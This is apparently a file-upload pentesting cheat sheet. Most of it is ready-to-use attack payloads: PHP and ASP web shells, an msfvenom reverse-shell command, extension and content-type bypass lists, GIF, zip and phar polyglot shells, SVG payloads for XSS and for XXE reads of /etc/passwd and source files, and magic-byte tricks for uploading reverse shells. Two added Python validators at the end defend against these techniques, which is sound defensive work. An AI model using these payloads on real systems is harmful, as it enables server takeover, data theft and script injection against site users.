# File Upload Pentesting

## PHP Upload Payloads (one liners)

```php
<?php echo file_get_contents('/etc/passwd'); ?>
<?php system('hostname'); ?>
<?php system($_REQUEST['cmd']); ?>
```

Classic ASP equivalent (not PHP):

```asp
<% eval request('cmd') %>
```

Generate a PHP reverse shell with msfvenom:

```shell
msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php
```

## PHP Code (Much better Output of RCE)

Save this code in a file:

```php
<?php if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST['cmd']); system($cmd); die; }?>
```

## PHP File Extensions For Burp Intruder

```text
.jpeg.php
.jpg.php
.png.php
.php
.php3
.php4
.php5
.php7
.php8
.pht
.phar
.phpt
.pgif
.phtml
.phtm
.php%00.gif
.php\x00.gif
.php%00.png
.php\x00.png
.php%00.jpg
.php\x00.jpg
```

## Content Types For File Upload

```text
image/bmp
image/cgm
image/g3fax
image/gif
image/ief
image/jpeg
image/ktx
image/pjpeg
image/png
image/prs.btif
image/svg+xml
image/tiff
image/vnd.adobe.photoshop
image/vnd.dece.graphic
image/vnd.djvu
image/vnd.dvb.subtitle
image/vnd.dwg
image/vnd.dxf
image/vnd.fastbidsheet
image/vnd.fpx
image/vnd.fst
image/vnd.fujixerox.edmics-mmr
image/vnd.fujixerox.edmics-rlc
image/vnd.ms-modi
image/vnd.net-fpx
image/vnd.wap.wbmp
image/vnd.xiff
image/webp
image/x-citrix-jpeg
image/x-citrix-png
image/x-cmu-raster
image/x-cmx
image/x-freehand
image/x-icon
image/x-pcx
image/x-pict
image/x-png
image/x-portable-anymap
image/x-portable-bitmap
image/x-portable-graymap
image/x-portable-pixmap
image/x-rgb
image/x-xbitmap
image/x-xpixmap
image/x-xwindowdump
application/vnd.3lightssoftware.imagescal
application/vnd.fastcopy-disk-image
application/vnd.imagemeter.folder+zip
application/vnd.imagemeter.image+zip
application/vnd.msa-disk-image
application/vnd.oci.image.manifest.v1+json
image/aces
image/avci
image/avcs
image/dicom-rle
image/emf
image/example
image/fits
image/heic
image/heic-sequence
image/heif
image/heif-sequence
image/hej2k
image/hsj2
image/jls
image/jp2
image/jph
image/jphc
image/jpm
image/jpx
image/jxr
image/jxra
image/jxrs
image/jxs
image/jxsc
image/jxsi
image/jxss
image/ktx2
image/naplps
image/prs.pti
image/pwg-raster
image/t38
image/tiff-fx
image/vnd.airzip.accelerator.azv
image/vnd.cns.inf2
image/vnd.globalgraphics.pgb
image/vnd.microsoft.icon
image/vnd.mix
image/vnd.mozilla.apng
image/vnd.pco.b16
image/vnd.radiance
image/vnd.sealed.png
image/vnd.sealedmedia.softseal.gif
image/vnd.sealedmedia.softseal.jpg
image/vnd.svf
image/vnd.tencent.tap
image/vnd.valve.source.texture
image/vnd.zbrush.pcx
image/wmf
```

## LFI and File Upload to RCE

### Crafting Malicious Image

We can create a malicious image and then try to get RCE:

```shell
echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif
```

### ZIP Upload To RCE

We can utilize the [zip](https://www.php.net/manual/en/wrappers.compression.php) wrapper to execute PHP code. However, this wrapper isn't enabled by default, so this method may not always work. To do so, we can start by creating a PHP web shell script and zipping it into a zip archive (named `shell.jpg`), as follows:

```shell
echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php
```

### PHAR Upload

We can use the `phar://` wrapper to achieve a similar result. To do so, we first write the following PHP script into a `shell.php` file:

```php
<?php
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('shell.txt', '<?php system($_GET["cmd"]); ?>');
$phar->setStub('<?php __HALT_COMPILER(); ?>');

$phar->stopBuffering();
```

Running this script produces a `phar` archive that contains a `shell.txt` sub-file holding the web shell, which we can interact with. We compile it into a `phar` file and rename it to `shell.jpg` as follows:

```shell-session
php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg
```

Now we should have a phar file called `shell.jpg`. Once we upload it to the web application, we can call it through `phar://` with its URL path, append the phar sub-file `/shell.txt` (URL encoded), and pass the command with `&cmd=id` to get its output.

## File Upload to XSS

### SVG File Upload to XSS

```xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert("XSS by Programmerboy");
  </script>
</svg>
```

## SVG Upload to File Read

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg>&xxe;</svg>
```

Using the PHP filter wrapper to read source files:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<svg>&xxe;</svg>
```

## SVG File Upload to RCE

Append the PHP reverse shell one-liner at the end of the SVG payload:

```xml
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=upload.php"> ]> <svg>&xxe;</svg> <?php system($_REQUEST['cmd']); ?>
```

<figure><img src="https://3420091786-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy1ZUO45eHY8aMCLJ7OiN%2Fuploads%2FxodiK5jknzhRdT61kfmw%2Fimage.png?alt=media&#x26;token=24670e7f-5fee-4d1a-8e14-f0bc6b4858f5" alt=""><figcaption></figcaption></figure>
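Defensive counterpart, added here as an example (not code from the original page): a check for uploaded SVGs that rejects the three shapes shown above, the `<script>` element, the DOCTYPE entity, and the trailing `<?php` block, plus event-handler attributes and `javascript:` links. The function name `check_svg` and the sample bodies are constructed for this example.

```python
import re
import xml.etree.ElementTree as ET

SVG_TAGS = ("svg", "{http://www.w3.org/2000/svg}svg")


def check_svg(data: bytes):
    """Return (ok, reason) for an uploaded SVG body.

    Text-level checks run before parsing because the parser hides what
    matters: a DOCTYPE entity is resolved or silently dropped, and a
    trailing '<?php ... ?>' is a legal XML processing instruction.
    """
    text = data.decode("utf-8", errors="replace")
    if re.search(r"<!(DOCTYPE|ENTITY)", text, re.I):
        return False, "DOCTYPE/ENTITY declaration (XXE surface)"
    # The only '<?' allowed is the XML declaration at offset 0.
    for m in re.finditer(r"<\?", text):
        if m.start() != 0 or not text.startswith("<?xml"):
            return False, "processing instruction in body"
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return False, f"not well-formed XML: {exc}"
    if root.tag not in SVG_TAGS:
        return False, "root element is not <svg>"
    for el in root.iter():
        local = el.tag.split("}")[-1].lower()
        if local in ("script", "foreignobject"):
            return False, f"<{local}> element"
        for name, value in el.attrib.items():
            attr = name.split("}")[-1].lower()  # drops the xlink namespace prefix
            if attr.startswith("on"):
                return False, f"event handler attribute {attr}"
            if attr == "href" and value.strip().lower().startswith("javascript:"):
                return False, "javascript: URL"
    return True, "ok"


# Constructed samples: the page's three SVG shapes plus a harmless icon.
SAMPLES = {
    "xss": b'<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>',
    "xxe": b'<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><svg>&xxe;</svg>',
    "rce": b'<svg xmlns="http://www.w3.org/2000/svg"/> <?php system($_REQUEST["cmd"]); ?>',
    "ok": b'<?xml version="1.0"?><svg xmlns="http://www.w3.org/2000/svg"><polygon points="0,0 0,50 50,0" fill="#009900"/></svg>',
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, check_svg(body))
```

Serving user SVGs with `Content-Disposition: attachment` or from a separate origin is the complementary control, since a check like this only covers the patterns it knows.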

## Magic Bytes

Sometimes there is a strong filter on the file extension when we upload files. We can try to bypass that using magic bytes: I upload a file with the extension the server requires, put the magic bytes of that format at the beginning, and make the rest of the file my reverse shell; in that case I get a reverse shell back.

<figure><img src="https://3420091786-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy1ZUO45eHY8aMCLJ7OiN%2Fuploads%2Frz4YbQbB3rG9rzpe5gfm%2Fimage.png?alt=media&#x26;token=751b248b-c0b6-4db6-afff-13228c4c9c9d" alt=""><figcaption><p>I am not allowed to upload any files except PDF files</p></figcaption></figure>

Now I add the PDF magic bytes at the beginning, and the rest of the file is a reverse shell.

<figure><img src="https://3420091786-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy1ZUO45eHY8aMCLJ7OiN%2Fuploads%2FDxbeIdzs7og1KRvQrmG0%2Fimage.png?alt=media&#x26;token=0018d330-014b-4a84-a30b-b2ce1cc4c7f6" alt=""><figcaption><p>Sometimes the PDF 1.4 header works for PDF files</p></figcaption></figure>

<figure><img src="https://3420091786-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy1ZUO45eHY8aMCLJ7OiN%2Fuploads%2FqYqGZZNpCYLiaX1KWrhT%2Fimage.png?alt=media&#x26;token=b66e8e5c-b628-4042-91e7-95346f625587" alt=""><figcaption><p>Sometimes the PDF 1.3 header works for PDF files</p></figcaption></figure>

<figure><img src="https://3420091786-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy1ZUO45eHY8aMCLJ7OiN%2Fuploads%2F69lKk0NW41FeJB1EYvOJ%2Fimage.png?alt=media&#x26;token=f8a46ad9-60ef-432c-a8a8-5bdc57f957e0" alt=""><figcaption><p>The file containing the ASPX reverse shell was uploaded successfully</p></figcaption></figure>

Now find where the file is being uploaded to and try to get a reverse shell.
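Defensive counterpart, added here as an example (not code from the original page): a server-side validator that rejects the tricks this cheat sheet relies on, the double and null-byte extensions from the Burp Intruder list, a spoofed Content-Type, the `GIF8<?php` polyglot, zip and phar archives renamed to `.jpg`, and a PDF magic-byte prefix in front of a shell. The allowlist, the marker list and the name `validate_upload` are assumptions made for this example.

```python
import re

# Allowlist for this endpoint (constructed for the example): extension -> (magic bytes, Content-Type)
ALLOWED = {
    "png": (b"\x89PNG\r\n\x1a\n", "image/png"),
    "gif": (b"GIF8", "image/gif"),
    "jpg": (b"\xff\xd8\xff", "image/jpeg"),
    "pdf": (b"%PDF-", "application/pdf"),
}
# Markers a genuine image or PDF body has no reason to contain (compared lower-cased).
CODE_MARKERS = (b"<?php", b"<?=", b"<%@", b"__halt_compiler")


def validate_upload(filename: str, content_type: str, data: bytes):
    """Return (ok, reason) for one upload.

    Each check answers one trick from this page: null bytes and double
    extensions in the name, a client-chosen Content-Type, archives renamed
    to .jpg, and a magic-byte prefix in front of server-side code
    ('GIF8<?php ...', '%PDF-1.4' followed by a shell).
    """
    # Null bytes (raw or %00) truncate the name on some stacks: reject outright.
    if "\x00" in filename or "%00" in filename.lower():
        return False, "null byte in filename"
    # Exactly one extension, so ".jpg.php" never reaches the allowlist.
    parts = filename.lower().split(".")
    if len(parts) != 2 or not re.fullmatch(r"[a-z0-9_-]+", parts[0]):
        return False, "filename must be name.ext with a single extension"
    ext = parts[1]
    if ext not in ALLOWED:
        return False, f"extension .{ext} not allowed"
    magic, expected_type = ALLOWED[ext]
    # The Content-Type header is attacker-controlled; it must agree with the extension.
    if content_type.split(";")[0].strip().lower() != expected_type:
        return False, "content-type does not match extension"
    # Magic bytes must match too, which catches zip (PK..) and phar bodies named .jpg.
    if not data.startswith(magic):
        return False, "magic bytes do not match extension"
    # Magic bytes alone are not enough: 'GIF8<?php ...' passes the check above.
    body = data.lower()
    if any(marker in body for marker in CODE_MARKERS):
        return False, "server-side code marker inside file body"
    return True, "ok"
```

Marker scanning is a backstop only: store uploads outside the web root with no script handler and re-encode images with an image library, so a polyglot that slips through is never interpreted.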
